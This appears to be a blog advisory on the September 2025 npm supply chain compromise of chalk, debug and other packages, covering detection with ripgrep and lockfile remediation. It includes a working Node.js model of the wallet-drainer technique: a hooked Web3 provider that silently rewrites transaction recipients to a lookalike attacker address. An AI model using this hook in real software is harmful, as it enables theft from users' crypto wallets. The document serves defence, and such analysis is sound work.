Largest npm Supply Chain Attack Ever: Aikido Security's Discovery, Technical Breakdown, and Remediation

A massive, rapid npm supply chain compromise hit the JavaScript ecosystem on September 8, 2025, affecting 18 core packages, including chalk and debug, with over 2.6 billion combined weekly downloads. This article gives a step-by-step account of how Aikido Security first detected the incident, what the injected malware does, how it spread through transitive dependencies, and concrete steps for auditing, detection, and cleanup. Aikido's live incident log is the reference for ongoing updates; I will keep my own findings and tips current here.


1. Attack Timeline and Aikido’s Discovery

On September 8, 2025 at 13:16 UTC, Aikido Security threat researchers flagged suspicious publish activity on packages owned by the npm maintainer qix. Their early alert kicked off one of the fastest security responses in recent npm history.

Key Points:

  • A phishing email sent from the lookalike domain npmjs.help led the maintainer to a fake npm login page that captured the username, password and one-time 2FA code, so the attacker could sign in even though 2FA was enabled.
  • Malicious versions of 18 widely consumed npm packages were published and stayed live for roughly two hours, long enough for any install or CI run in that window that resolved to the newest version to pull them in.
  • Aikido published its findings immediately and alerted the maintainer and npm, and the malicious versions were pulled from the registry.

The Full List of Compromised Packages:

Package               Weekly downloads (millions)   Purpose
ansi-styles           371.41                        Terminal styling
debug                 357.60                        Debugging utility
chalk                 299.99                        Terminal string coloring
supports-color        287.1                         Color support detection
strip-ansi            261.17                        Strip ANSI escape codes
ansi-regex            243.64                        Regex for ANSI escape codes
wrap-ansi             197.99                        Text wrapping in terminals
color-convert         193.5                         Color format conversion
color-name            191.71                        Color name mappings
is-arrayish           not listed                    Array utility
slice-ansi            not listed                    Slice ANSI escape codes
color-string          not listed                    Parse and serialize colors
simple-swizzle        not listed                    Argument normalization
has-ansi              not listed                    Check for ANSI presence
supports-hyperlinks   not listed                    Terminal hyperlink support
error-ex              not listed                    Enhanced error objects
chalk-template        not listed                    Chalk template strings
backslash             not listed                    Backslash escaping

(Exact download counts for some smaller packages vary but all are integral micro-packages with deep dependency penetration.)

For verified, real-time updates and new remediation steps, refer to Aikido’s live incident log:
Aikido Threat Log & Ongoing Updates.

I will keep updating this blog with new package lists, threats, and best practices as more technical analysis appears. Bookmark or follow for dynamic, developer-focused advisories.


2. Why Your App Might Be Affected — Even If You Never Installed These Packages Directly

Most npm projects never list chalk or debug directly. But these micro-packages sit underneath popular UI libraries, build tools, CLIs, and backend frameworks, so a transitive dependency can pull the malicious version into your tree without any change to your own package.json.

  • Indirect usage: your build can include the infected code simply because a framework or tool you depend on declares a semver range (for example ^5.0.0) that the malicious patch release satisfied.
  • Automated deployments: CI runs that install without a committed lockfile, or that run npm update, resolved to the newest matching version during the attack window, and package caches may still hold those versions afterwards.
  • Unawareness: teams that shipped a build during the window may already have deployed front-end bundles containing the wallet-draining code without knowing it.

What This Means:
Even if your package.json never mentions a compromised package, audit the lockfile and the full resolved dependency tree (npm ls <package> shows every path by which a package is pulled in) rather than trusting the manifest.


3. Technical Breakdown: Malware Actions and Browser/Wallet Targeting

Malware Details

  • The injected code is inert outside a browser: it targets window.ethereum, fetch and XMLHttpRequest, so server-side Node.js processes do not execute the payload. The malicious version still sits in those projects' lockfiles and node_modules, though, and must be removed.
  • Hooks Web3 providers such as MetaMask through window.ethereum and rewrites the destination of outgoing transactions to an attacker-controlled address, choosing the one with the smallest Levenshtein distance to the legitimate address so the swap survives a casual visual check.
  • Targets multiple chains: Ethereum, Bitcoin, Solana, and others.
  • Wraps fetch and XMLHttpRequest so that addresses passing through the page (for example a deposit address returned by an API) can be rewritten in transit as well, which catches users of dapps, wallet browser extensions, and direct RPC calls alike.
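The address swap described above, as an added example in Node.js. This is not code from the original post, from Aikido, or from the malware itself: it models the technique with a hooked provider object standing in for window.ethereum, a Levenshtein-based lookalike picker, and the check a dapp or wallet can make on the defensive side. Every address in it is a constructed sample.

```javascript
// Added example (not code from the original post, Aikido, or the malware):
// a Node.js model of the address-swap technique described above. A hooked
// Web3 provider intercepts eth_sendTransaction and replaces `to` with the
// attacker-controlled address that is closest, by Levenshtein distance, to the
// address the user meant to pay. Every address below is a constructed sample.
"use strict";

// Levenshtein edit distance, single-row dynamic programming.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0]; // cell above-left of the one being computed
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Choose the pool entry a human is least likely to notice was swapped in.
function closestLookalike(target, pool) {
  let best = { address: null, distance: Infinity };
  for (const candidate of pool) {
    const distance = levenshtein(target.toLowerCase(), candidate.toLowerCase());
    if (distance < best.distance) best = { address: candidate, distance };
  }
  return best;
}

// Rewrite the destination of one transaction object (pure, synchronous helper).
function swapDestination(tx, pool) {
  if (typeof tx.to !== "string") return tx;
  return { ...tx, to: closestLookalike(tx.to, pool).address };
}

// Hook provider.request(): only eth_sendTransaction is touched; everything
// else passes through so the dapp keeps working and nothing looks broken.
function hookProvider(provider, pool) {
  const original = provider.request.bind(provider);
  provider.request = async function (args) {
    if (args && args.method === "eth_sendTransaction" && Array.isArray(args.params)) {
      const [tx, ...rest] = args.params;
      return original({ ...args, params: [swapDestination(tx, pool), ...rest] });
    }
    return original(args);
  };
  return provider;
}

// Stand-in for window.ethereum that records what it was asked to sign.
function makeMockProvider() {
  const seen = [];
  return { seen, async request(args) { seen.push(args); return "0xmocktxhash"; } };
}

// Defensive check a dapp or wallet can make: the address shown to the user
// must match the one that actually reaches the provider.
function detectSwap(intendedTo, observedTo) {
  return intendedTo.toLowerCase() !== observedTo.toLowerCase();
}

// Constructed sample data: the victim's intended recipient and an attacker pool
// containing one near-duplicate that differs only in the last two characters.
const VICTIM_TO = "0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B";
const ATTACKER_POOL = [
  "0x1111111111111111111111111111111111111111",
  "0xAb5801a7D398351b8bE11C439e05C5B3259aeC00",
  "0x2222222222222222222222222222222222222222",
];

async function demo() {
  const provider = hookProvider(makeMockProvider(), ATTACKER_POOL);
  await provider.request({ method: "eth_chainId" }); // passes through untouched
  await provider.request({
    method: "eth_sendTransaction",
    params: [{ from: "0x3333333333333333333333333333333333333333", to: VICTIM_TO, value: "0x1" }],
  });
  const observedTo = provider.seen[1].params[0].to;
  return { observedTo, swapped: detectSwap(VICTIM_TO, observedTo) };
}

demo().then((result) => console.log(result));
```

The point to take from the demo is that the hook never errors and never touches read-only calls, so a user sees a working dapp and a wallet prompt whose address differs from the intended one by two trailing characters. The only reliable defence at the user level is to compare the full address in the wallet's confirmation dialog against the one they meant to pay; at the application level, ship clean dependencies so the hook is never installed in the first place.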

4. How to Detect and Audit Infected Code

Ripgrep (rg) Command: Safe Usage

Security teams, Aikido among them, recommend ripgrep (rg) as a fast, read-only way to scan for the malware indicator: it only searches file contents and never modifies files.

   
rg -u --max-columns=80 _0x112fa8

  • -u tells ripgrep to stop honoring .gitignore rules, so directories that are normally ignored (node_modules above all) are searched; use -uu if you also need hidden files and directories included.
  • --max-columns=80 truncates long lines in the output, which keeps hits in minified bundles readable.
  • The string _0x112fa8 is an identifier from the obfuscated payload that Aikido's analysis flagged as a reliable indicator. It is one indicator of compromise, not proof of absence: a clean scan does not replace the lockfile check.

Run it over node_modules, your build output (dist, .next, and similar), and any deployed artifacts you can pull back. If you find matches, remove the affected versions from the lockfile and node_modules, reinstall from clean releases, and rebuild and redeploy every artifact produced from the tainted tree. If you find nothing, still check your lockfiles and redeploy clean builds for anything your team built or deployed during the attack window.


5. Impact and Remediation: What Developers and Organizations Must Know

Thanks to the rapid detection and response, the malicious package versions were live only about two hours. Yet due to the immense reach via transitive dependencies, the attack’s exposure is broad.

Exposure Beyond Direct Usage

Because many JavaScript projects depend on the compromised utilities only indirectly, applications that never reference them explicitly can still have bundled the malicious code. Compounding this, CI/CD pipelines fetch dependencies automatically, so a team may not realise that a build deployed during the attack window carries the malware.

The result is silent inclusion in builds and deployments, which is an ongoing risk until those artifacts are rebuilt.

Immediate Recommendations to Remediate

  1. Audit and Update Dependencies:
    Scan package-lock.json or yarn.lock for the specific malicious versions published on Sept 8, 2025 (listed in Aikido's incident log and npm's advisories). Move each affected package to the last clean release or the fixed release published afterwards, and use npm ls <package> to confirm no nested copy remains.

  2. Rebuild and Redeploy:
    Rebuild, from the cleaned dependency tree, any artifact built or deployed within the attack window or from a lockfile that resolved to an affected version, then redeploy it.

  3. Scan for Malware Indicators:
    Use the rg command above and modern security scanners to detect suspicious payloads.

  4. Strengthen Authentication:
    Adopt hardware security keys and enforce multi-factor authentication on npm publishing accounts.

  5. Monitor Wallet and User Activity:
    Especially for crypto-enabled apps, watch for suspicious wallet activity or user complaints.
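The lockfile audit that section 2 calls for and that step 1 above describes, as an added example in Node.js. This is not code from the original post or from Aikido: it walks the "packages" map of a package-lock.json (lockfileVersion 2 or 3), flags every installed copy of a listed version, nested copies included, and names the packages that declare a dependency on it. The two entries in COMPROMISED are sample values for the demo and must be replaced with the authoritative list from Aikido's log or the npm advisory; the lockfile in the block is constructed.

```javascript
// Added example (not code from the original post or from Aikido): a Node.js
// auditor for package-lock.json (lockfileVersion 2 or 3, which carry a
// "packages" map keyed by install path). It flags any installed copy of a
// listed version, including nested copies under a dependency's own
// node_modules, and names the packages that pull it in. The entries in
// COMPROMISED are sample values for the demo: take the authoritative list from
// Aikido's incident log or the npm advisory. SAMPLE_LOCK is constructed.
"use strict";

const COMPROMISED = {
  chalk: new Set(["5.6.1"]), // sample entry, confirm against the advisory
  debug: new Set(["4.4.2"]), // sample entry, confirm against the advisory
};

const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"
function packageNameFromPath(installPath) {
  const marker = "node_modules/";
  const idx = installPath.lastIndexOf(marker);
  return idx === -1 ? installPath : installPath.slice(idx + marker.length);
}

// Every entry (root included) whose declared dependencies mention `name`.
// This is by name, not by resolved path: npm's hoisting decides which copy each
// requirer actually gets, so use `npm ls <name>` for the exact resolution.
function findRequirers(lock, name) {
  const requirers = [];
  for (const [installPath, entry] of Object.entries(lock.packages)) {
    if (DEP_FIELDS.some((f) => entry[f] && hasOwn(entry[f], name))) {
      requirers.push(installPath === "" ? "(root package.json)" : packageNameFromPath(installPath));
    }
  }
  return requirers;
}

function auditLockfile(lock, compromised = COMPROMISED) {
  if (!lock || !lock.packages || typeof lock.packages !== "object") {
    throw new Error("expected a lockfileVersion 2 or 3 package-lock.json with a 'packages' map");
  }
  const hits = [];
  for (const [installPath, entry] of Object.entries(lock.packages)) {
    if (installPath === "") continue; // the root project itself
    const name = packageNameFromPath(installPath);
    const badVersions = compromised[name];
    if (badVersions && badVersions.has(entry.version)) {
      hits.push({ name, version: entry.version, installPath, requiredBy: findRequirers(lock, name) });
    }
  }
  return hits;
}

// Read and audit a real lockfile: auditLockfileAt("./package-lock.json")
async function auditLockfileAt(file) {
  const fs = await import("node:fs");
  return auditLockfile(JSON.parse(fs.readFileSync(file, "utf8")));
}

// Constructed sample: the app never lists chalk or debug directly. A CLI
// framework resolved chalk to the flagged version; the hoisted debug is clean,
// but a legacy logger carries its own nested copy at the flagged version.
const SAMPLE_LOCK = {
  name: "sample-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "sample-app", dependencies: { "some-cli-framework": "^2.0.0", "legacy-logger": "^1.0.0" } },
    "node_modules/some-cli-framework": { version: "2.0.3", dependencies: { chalk: "^5.3.0", debug: "^4.3.0" } },
    "node_modules/chalk": { version: "5.6.1", dependencies: {} },
    "node_modules/debug": { version: "4.3.7" },
    "node_modules/ansi-styles": { version: "6.2.1" },
    "node_modules/legacy-logger": { version: "1.0.0", dependencies: { debug: "^4.4.0" } },
    "node_modules/legacy-logger/node_modules/debug": { version: "4.4.2" },
  },
};

for (const hit of auditLockfile(SAMPLE_LOCK)) {
  console.log(`${hit.name}@${hit.version} at ${hit.installPath}, required by: ${hit.requiredBy.join(", ")}`);
}
```

The nested debug copy is the case a grep of package.json files misses: the top-level debug is clean, so a quick look at the hoisted tree says nothing is wrong, while the copy under legacy-logger/node_modules is the flagged version. yarn.lock uses a different, non-JSON format and needs its own parser; the same version table applies.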


Lessons Learned and Broader Implications

  • Concentration of Trust: one compromised maintainer account put malicious code into packages that together see billions of downloads a week.
  • Micro-Package Risks: Extremely deep dependency graphs are a security challenge.
  • Phishing Sophistication: The attackers’ convincing spoofing of email and domains highlights social engineering as a primary threat.

Best Practices Going Forward

  • Use and commit package lockfiles, and install with npm ci in CI so the lockfile is honored exactly and a new patch release cannot slip in unreviewed.
  • Pin dependency versions in production.
  • Regularly run npm audit or an equivalent scanner, remembering that it can only flag versions for which an advisory has already been published.
  • Enable hardware 2FA on all maintainer accounts.
  • Educate developers on phishing and social engineering threats.
  • Implement monitoring and rapid incident response protocols.

Conclusion

The September 2025 npm supply chain attack highlights the fragility of software supply chains and the importance of advanced detection and response practices. The swift community and security team action limited damage, but the incident urges everyone to remain vigilant and improve open source ecosystem security continuously.

Stay updated with official npm advisories and apply security patches immediately. Use ripgrep and other security tools regularly to uncover hidden compromises in your project dependencies.


This blog will be maintained with ongoing updates as new information and tooling emerge. Bookmark or subscribe for continuing analysis and remediation advice.